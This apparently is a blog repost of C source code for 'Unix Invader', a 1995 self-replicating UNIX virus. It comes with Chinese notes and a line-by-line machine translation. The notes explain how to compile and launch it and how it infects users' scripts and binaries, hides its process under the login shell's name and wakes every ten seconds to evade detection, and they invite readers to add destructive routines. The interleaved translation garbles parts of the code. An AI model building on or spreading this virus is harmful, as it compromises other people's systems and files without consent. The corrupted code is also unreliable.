This is a computer virus under UNIX,
virus name: Unix Invader (入侵者) virus name: Unix Invader (intruder)
written by NCKU htk written by NCKU htk
其特点有: Its characteristics are:
1.其具有daemon process 的特性(lose control tty) 1 its a daemon process features (lose control tty)
故该process owner 没在线上,该病毒依旧能作用执行,不会被系统终结. Thus, the process owner not online, the role of the virus is still able to perform, the system will not be the end.
2.其可感染UNIX 上script file 和各型binary file(当然要属性得宜) ,不重复感染.感染完后,该执行档或script file 依旧可执行...(好像是废话) (2) The script file on UNIX can be infected and the type of binary file (of course, to attribute properly), do not repeat infections. After infection, the executable file or script file is still executable ... (like crap)
3.其在记忆体上所用的隐藏方法是,扫描passwd file,取用该user 的login shell basename 作为程式名,故,用ps -aux(单ps 看不到)或top 之类的程式,要仔细看,才会被发现...(有点奸诈) 3 memory on its hide is used, scanning passwd file, access to the user's login shell basename as the program name, so, using ps-aux (ps do not see one) or top of the class of programs, to Look carefully, will be found ... (somewhat treacherous)
4.其不重复长驻,顶多一个user 一只,目地是为扩大感染能力5.其它...没了. 4 it does not repeat the resident, at most, a user one, head to the ability to expand infection 5. ... Not the other.
6.本来要增加root kill -9 也杀不死的能力,但,时间有限,且经济效益不高所以作罢...(别跟我说kill -9 pid 是无敌的,我依然有办法)如何实验? 6 had increased root kill -9 to kill also the ability, but time is limited, and the cost is not high, so give up ... (Do not tell me kill -9 pid is invincible, and I still have a way) how the experiment ?
cp 几个binary file 到你的home directory 里,做几个开头字元是# 的script file .... cp a few binary file to your home directory, the characters are beginning to do some of the script file .... #
如何起动? How to start?
1.先把此档案设定为filename.c 1 This file is set to filename.c first
2. gcc -O -o virus@ filename.c 或cc -O -o virus@ filename.c 2. Gcc-O-o virus@filename.c or cc-O-o virus@filename.c
^ ^ 很重要一定要有! ^ ^ Very important must have!
3.然后可能会有些警告讯习,管它....,然后,应该会有个virus@ 档出现 3 then there may be some warning signal learning, whether it ...., then, should there be a virus @ file
4. ls -l 看看该(virus@)档案长度多长,记好. 4. Ls-l to see the (virus @) file length long, remember well.
5.用vi 或任何editor 再回来改filename.c 里面的#define 后面档案长度(有标示here 的地方) 5 with vi or any editor to come back inside to change filename.c # define the length of the back file (where there is marked here)
6.然后重覆第2.个步骤,然后得到的virus@ 才是我们要的. 6 and then repeat the first 2 steps, then get the virus @ is what we want.
7.执行它...ok! :) 7 do it ... ok!:)
8.你就中毒了(十秒内)........以后一旦有适合的档案将会马上被感染... 8 You poisoned (ten seconds )........ after the file suitable for once will immediately be infected ...
其它:1.此virus ,小弟未作发作部份,因为,破坏的事人人会做,我不想浪费精力想个残忍的破坏动作........有兴趣的人,可以自己去加上.... Other: 1 This virus, the absence of seizures brother part, because everyone would do damage to something, I do not want to waste energy like a cruel destruction of action ........ who are interested, can go plus ....
2.此virus ,在UNIX 作业系统下执行,故证明一点....只要有人类,没有什么不可能有virus 的environment,方法是人想出来的. (2) of this virus, run under the UNIX operating system, it is proved that .... as long as there are human beings, nothing is impossible with virus of the environment, is people who want out.
3.若以一个system administrator 的眼光来看此毒,亦可以得到个结论,能被此virus 感染的该帐号,被Crack 的机会是相当高. 3 If a system administrator's point of view of this drug, they can get a conclusion that can be infected with this virus of the account, was Crack the chance is very high.
4.此virus 目前是以线上所有人的home directory 为感染search 开端,其实,若该user 的目录下有个dynamic symbolic link 到根目录下,search就可能把整个wrok station 的目录扫完. 4 This virus is now home directory of all online search for the beginning of infection, in fact, if the user's directory has a dynamic symbolic link to the root directory, search is likely to bring the entire directory Saowan wrok station.
5.此virus 并不时时扫描目录,内定是10 秒,唤醒一次,以免被发现... :) 5 This virus does not always scan the directory, default is 10 seconds, wake up time, so as not to be found ...:)
6.此virus 是翻脸不认人的,所以你自己的目录也会被感染,自己的属姓设定是没有用的,所以实验前赶紧搬一搬吧! 6 This virus is betray you, so your directory will be infected, belong to their name set is of no use, so move quickly before the experiment a move it!
7.任意实验此病毒于公用的工作站是相当不道德的,作者是在自己的linux上实验,您...自个好自为之,被抓到或被踢除帐号,别怪作者htk没先跟你说.OK? 7 any virus in this experiment is quite common workstation immoral, the authors in their own experiments on linux, you ... from a look out for themselves, caught or kicked account, do not blame the author did not talk to you htk said. OK?
大家好好玩吧! We have fun!
注:Dark Slayer 乃现任Taiwan Power Virus Orginization 头头是也... Note: Dark Slayer is the current head of Taiwan Power Virus Orginization is also ...
1995/6/15> 1995/6/15>
*/ * /
/* A VIRUS IN UNIX !!!! */ / * A VIRUS IN UNIX!!!! * /
/* written by NCKU EE htk */ / * Written by NCKU EE htk * /
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#define CHK 512 # Define CHK 512
#define PERM S_IRWXU # Define PERM S_IRWXU
#define CHKT 10 # Define CHKT 10
#define LOADER "\nrm -f /tmp/.@`whoami`;cat < " # Define LOADER "\ nrm-f / tmp /. @` Whoami `; cat <"
#define LOADER2 " |tail -c 18606 >/tmp/.@`whoami`;chmod 700 # Define LOADER2 "| tail-c 18606> / tmp /. @` Whoami `; chmod 700
/tmp/.@`whoami`;/tmp/.@`whoami`;rm -f /tmp/.@`whoami`;exit;\n" / Tmp /. @ `Whoami`; / tmp /. @ `Whoami`; rm-f / tmp /. @ `Whoami`; exit; \ n "
/* ^^^^^modify here !!! */ / * ^^^^^ Modify here!!! * /
#define VL 18606 # Define VL 18606
/* and ^^^^^ here !!! */ / * And ^^^^^ here!!! * /
#define VLL -VL # Define VLL-VL
#define BUFSIZE 25088 # Define BUFSIZE 25088
#define BSI 80 # Define BSI 80
#define EXE 1 # Define EXE 1
#define SCR 2 # Define SCR 2
struct flock bk; struct flock bk;
int fo,f,status=NULL; int fo, f, status = NULL;
int flagn=0; int flagn = 0;
void main(argc,argv,envp) void main (argc, argv, envp)
int argc; int argc;
char *argv[]; char * argv [];
char *envp[]; char * envp [];
{ {
char *buf2,*fname; char * buf2, * fname;
static char pidp[BSI]="/tmp/."; static char pidp [BSI] = "/ tmp /.";
static char bufr[BSI]=""; static char bufr [BSI ]="";
static int dec; static int dec;
unsigned int k,kep; unsigned int k, kep;
struct passwd *getp; struct passwd * getp;
int caller(void); int caller (void);
int chec(int); int chec (int);
char *base(char *); char * base (char *);
char *find(void); char * find (void);
void catch(void); void catch (void);
int check(char *,int); int check (char *, int);
signal(SIGCLD,SIG_IGN); signal (SIGCLD, SIG_IGN);
strcat(pidp,ecvt((double)getuid(),chec(getuid()),&dec,&dec)); strcat (pidp, ecvt ((double) getuid (), chec (getuid ()),& dec, & dec));
fname=(char *)tempnam("/tmp",NULL); fname = (char *) tempnam ("/ tmp", NULL);
buf2=(char *)malloc(BUFSIZE); buf2 = (char *) malloc (BUFSIZE);
if((fo=open(argv[0],O_RDONLY))<0 || (f=creat(fname,PERM))<0) exit(1); if ((fo = open (argv [0], O_RDONLY)) <0 | | (f = creat (fname, PERM)) <0) exit (1);
if((kep=lseek(fo,0L,2))>2*VL) if ((kep = lseek (fo, 0L, 2))> 2 * VL)
{ {
lseek(fo,VLL,2); lseek (fo, VLL, 2);
k=read(fo,buf2,VL); k = read (fo, buf2, VL);
write(f,buf2,k); write (f, buf2, k);
lseek(fo,VL,0); lseek (fo, VL, 0);
while((k=read(fo,buf2,BUFSIZE))>0) while ((k = read (fo, buf2, BUFSIZE))> 0)
write(f,buf2,k); write (f, buf2, k);
/* ignore more lefting virus in a tail */ / * Ignore more lefting virus in a tail * /
} }
else else
{ {
lseek(fo,VL-kep,2); lseek (fo, VL-kep, 2);
k=read(fo,buf2,kep-VL); k = read (fo, buf2, kep-VL);
write(f,buf2,k); write (f, buf2, k);
} }
close(f); close (f);
chmod(fname,S_IRWXU); chmod (fname, S_IRWXU);
free(buf2); free (buf2);
if((kep=fork())>0) if ((kep = fork ())> 0)
{ {
for(k=0;k if(*(argv[0]+k)=='@') exit(0); for (k = 0; k if (* (argv [0] + k )=='@') exit (0);
execve(fname,argv,envp); execve (fname, argv, envp);
} }
else else
if(kep==0) if (kep == 0)
{ {
sleep(2); sleep (2);
unlink(fname); unlink (fname);
for(k=0;k getp=(struct passwd *)getpwuid(getuid()); for (k = 0; k getp = (struct passwd *) getpwuid (getuid ());
strcpy(argv[0],base(getp->pw_shell)); strcpy (argv [0], base (getp-> pw_shell));
/* initialize daemon process ... */ / * Initialize daemon process ... * /
for(k=0;k<2;k++) close(k); for (k = 0; k <2; k + +) close (k);
umask(0); umask (0);
if(fork()!=0)exit(0); if (fork ()! = 0) exit (0);
signal(SIGHUP,SIG_IGN); signal (SIGHUP, SIG_IGN);
signal(SIGINT,SIG_IGN); signal (SIGINT, SIG_IGN);
signal(SIGTTOU,SIG_IGN); signal (SIGTTOU, SIG_IGN);
setpgrp(); setpgrp ();
if((kep=open("/dev/tty",O_RDWR))>=0) if ((kep = open ("/ dev / tty", O_RDWR))> = 0)
{ ioctl(kep,TIOCNOTTY,(char *)0); {Ioctl (kep, TIOCNOTTY, (char *) 0);
close(kep); close (kep);
} }
if(fork()!=0)exit(0); if (fork ()! = 0) exit (0);
signal(SIGUSR1,catch); signal (SIGUSR1, catch);
if((kep=open(pidp,O_CREAT|O_RDWR,S_IRUSR|S_IWUSR))<0) exit(1); if ((kep = open (pidp, O_CREAT | O_RDWR, S_IRUSR | S_IWUSR)) <0) exit (1);
k=read(kep,bufr,BSI); k = read (kep, bufr, BSI);
if(k!=0) kill(atoi(bufr),SIGUSR1); if (k! = 0) kill (atoi (bufr), SIGUSR1);
strcpy(bufr,ecvt((double)getpid(),chec(getpid()),&dec,&dec)); strcpy (bufr, ecvt ((double) getpid (), chec (getpid ()),& dec, & dec));
lseek(kep,0L,0); lseek (kep, 0L, 0);
do{ do {
k=write(kep,bufr,strlen(pidp)+1); k = write (kep, bufr, strlen (pidp) +1);
while((buf2=find())!=NULL) while ((buf2 = find ())!= NULL)
{ {
getp=(struct passwd *)getpwnam(buf2); getp = (struct passwd *) getpwnam (buf2);
if(chdir((buf2=(char *)getp->pw_dir))<0) continue; if (chdir ((buf2 = (char *) getp-> pw_dir)) <0) continue;
if(ftw(buf2,caller,15)!=0) continue; if (ftw (buf2, caller, 15)! = 0) continue;
} }
sleep(CHKT); sleep (CHKT);
setutent(); setutent ();
lseek(kep,0L,0); lseek (kep, 0L, 0);
}while(1); } While (1);
} }
} }
int chec(num) int chec (num)
int num; int num;
{ {
int y=1; int y = 1;
while((num=(int)(num/10))>=1) y++; while ((num = (int) (num/10))> = 1) y + +;
return(y); return (y);
} }
void catch(void) void catch (void)
{ {
flagn=1; flagn = 1;
} }
char *base(poi) char * base (poi)
char *poi; char * poi;
{ int i; {Int i;
for(i=(strlen(poi)-1);i>=0;i--) for (i = (strlen (poi) -1); i> = 0; i -)
if(*(poi+i)=='/') return((char *)(poi+i+1)); if (* (poi + i )=='/') return ((char *) (poi + i +1));
return("sh"); return ("sh");
} }
char *find() char * find ()
{ {
static char name[9]=""; static char name [9 ]="";
struct utmp *goal; struct utmp * goal;
goal=(struct utmp *)getutent(); goal = (struct utmp *) getutent ();
if(goal->ut_type==USER_PROCESS) if (goal-> ut_type == USER_PROCESS)
{ {
strcpy(name,goal->ut_user); strcpy (name, goal-> ut_user);
return(name); return (name);
} }
if(goal==(struct utmp *)NULL) return(NULL); if (goal == (struct utmp *) NULL) return (NULL);
} }
int caller(name,statptr,type) int caller (name, statptr, type)
char *name; char * name;
struct stat *statptr; struct stat * statptr;
int type; int type;
{ unsigned int nread,ymode; {Unsigned int nread, ymode;
static char load[200]; static char load [200];
char buf[VL],buf3[VL]; char buf [VL], buf3 [VL];
if(type==FTW_F) if (type == FTW_F)
{ {
ymode=statptr->st_mode; ymode = statptr-> st_mode;
if(check(name,ymode)<0) if (check (name, ymode) <0)
{ if(statptr->st_uid==getuid()) chmod(name,ymode); {If (statptr-> st_uid == getuid ()) chmod (name, ymode);
return(0); return (0);
} }
if( status==SCR ) if (status == SCR)
{ {
strcpy(load,LOADER); strcpy (load, LOADER);
strcat(load,name); strcat (load, name);
strcat(load,LOADER2); strcat (load, LOADER2);
lseek(f,0L,2); lseek (f, 0L, 2);
write(f,load,strlen(load)); write (f, load, strlen (load));
lseek(fo,0L,0); lseek (fo, 0L, 0);
nread=read(fo,buf,VL); nread = read (fo, buf, VL);
write(f,buf,nread); write (f, buf, nread);
} }
if( status==EXE ) if (status == EXE)
{ {
if(statptr->st_size>VL) if (statptr-> st_size> VL)
{ {
lseek(f,0L,0); lseek (f, 0L, 0);
nread=read(f,buf,VL); nread = read (f, buf, VL);
lseek(f,0L,2); lseek (f, 0L, 2);
write(f,buf,nread); write (f, buf, nread);
lseek(fo,0L,0); lseek (fo, 0L, 0);
nread=read(fo,buf,VL); nread = read (fo, buf, VL);
lseek(f,0L,0); lseek (f, 0L, 0);
write(f,buf,nread); write (f, buf, nread);
} }
else else
{ {
lseek(f,0L,0); lseek (f, 0L, 0);
nread=read(f,buf3,VL); nread = read (f, buf3, VL);
ymode=nread; ymode = nread;
lseek(fo,0L,0); lseek (fo, 0L, 0);
nread=read(fo,buf,VL); nread = read (fo, buf, VL);
lseek(f,0L,0); lseek (f, 0L, 0);
write(f,buf,nread); write (f, buf, nread);
write(f,buf3,ymode); write (f, buf3, ymode);
} }
} }
/* lseek(f,0L,0); / * Lseek (f, 0L, 0);
lockf(f,F_ULOCK,0); */ lockf (f, F_ULOCK, 0); * /
/* author's linux library has no above program library */ / * Author's linux library has no above program library * /
bk.l_type=F_UNLCK; bk.l_type = F_UNLCK;
bk.l_whence=0; bk.l_whence = 0;
bk.l_len=0; bk.l_len = 0;
bk.l_start=0; bk.l_start = 0;
fcntl(f,F_SETLK,&bk); fcntl (f, F_SETLK, & bk);
if(statptr->st_uid==getuid()) chmod(name,ymode); if (statptr-> st_uid == getuid ()) chmod (name, ymode);
close(f); close (f);
} }
if(flagn) exit(0); if (flagn) exit (0);
return(0); return (0);
} }
int check(name,ymode) int check (name, ymode)
char *name; char * name;
int ymode; int ymode;
{ {
char ch[CHK]; char ch [CHK];
char ch2[CHK]; char ch2 [CHK];
int rd,i; int rd, i;
status=(int)NULL; status = (int) NULL;
if((f=open(name,O_RDWR))<0) if ((f = open (name, O_RDWR)) <0)
{ {
if(chmod(name,ymode|S_IRUSR|S_IWUSR)<0) return(-1); if (chmod (name, ymode | S_IRUSR | S_IWUSR) <0) return (-1);
if((f=open(name,O_RDWR))<0) return(-1); if ((f = open (name, O_RDWR)) <0) return (-1);
} }
/* if(lockf(f,F_TLOCK,0)<0) { close(f); return(-1); } */ / * If (lockf (f, F_TLOCK, 0) <0) {close (f); return (-1);} * /
bk.l_type=F_WRLCK; bk.l_type = F_WRLCK;
bk.l_whence=0; bk.l_whence = 0;
bk.l_len=0; bk.l_len = 0;
bk.l_start=0; bk.l_start = 0;
if(fcntl(f,F_SETLK,&bk)<0) { close(f); return(-1); } if (fcntl (f, F_SETLK, & bk) <0) {close (f); return (-1);}
lseek(f,0L,0); lseek (f, 0L, 0);
rd=read(f,ch,CHK); rd = read (f, ch, CHK);
lseek(fo,0L,0); lseek (fo, 0L, 0);
read(fo,ch2,rd); read (fo, ch2, rd);
for(i=0;i if(ch[i]!=ch2[i]) for (i = 0; i if (ch [i]! = ch2 [i])
{ {
if( ch[0]!='#' && (ymode&(S_IXUSR|S_IXGRP|S_IXOTH)) ) if (ch [0 ]!='#' & & (ymode & (S_IXUSR | S_IXGRP | S_IXOTH)))
{ {
status=EXE; return(1); } status = EXE; return (1);}
else else
if( ch[0]=='#' && lseek(f,0L,2)>VL ) /* you can improve the rule */ if (ch [0 ]=='#' & & lseek (f, 0L, 2)> VL) / * you can improve the rule * /
{ {
lseek(f,VLL,2); lseek (f, VLL, 2);
rd=read(f,ch,CHK); rd = read (f, ch, CHK);
lseek(fo,0L,0); lseek (fo, 0L, 0);
read(fo,ch2,rd); read (fo, ch2, rd);
for(i=0;i if(ch[i]!=ch2[i]) for (i = 0; i if (ch [i]! = ch2 [i])
{ status=SCR; return(1); } {Status = SCR; return (1);}
} }
else if(ch[0]=='#') else if (ch [0 ]=='#')
{ status=SCR; return(1); } {Status = SCR; return (1);}
break; break;
} }
close(f); close (f);
return(-1); return (-1);
} }
Tidak ada komentar:
Posting Komentar